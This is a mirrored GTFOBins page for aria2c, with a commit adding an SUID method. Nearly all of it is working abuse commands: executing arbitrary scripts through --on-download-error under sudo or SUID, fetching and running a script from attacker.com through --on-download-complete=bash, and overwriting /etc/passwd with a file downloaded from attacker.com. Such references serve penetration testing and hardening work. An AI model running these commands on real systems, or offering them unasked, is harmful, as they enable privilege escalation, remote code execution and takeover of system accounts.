mirror/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-10-18 05:18:13 +02:00
Code Issues
42cac0885e
GTFOBins.github.io/_gtfobins/aria2c.md
ohyicong 42cac0885e Add SUID method to aria2c 
Found this new method of abusing aria2c's suid for privilege escalation.
2023-01-02 16:36:59 +08:00

1.2 KiB
Raw Blame History

description functions
Note that the subprocess is immediately sent to the background.
command sudo suid limited-suid
code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF aria2c --on-download-error=$TF http://x
description code
The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID. aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF sudo aria2c --on-download-error=$TF http://x
code
aria2c -d /etc/ -o passwd "http://attacker.com/passwd" --allow-overwrite=true
description
Remote download and replace /etc/passwd with root privilege.
code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF ./aria2c --on-download-error=$TF http://x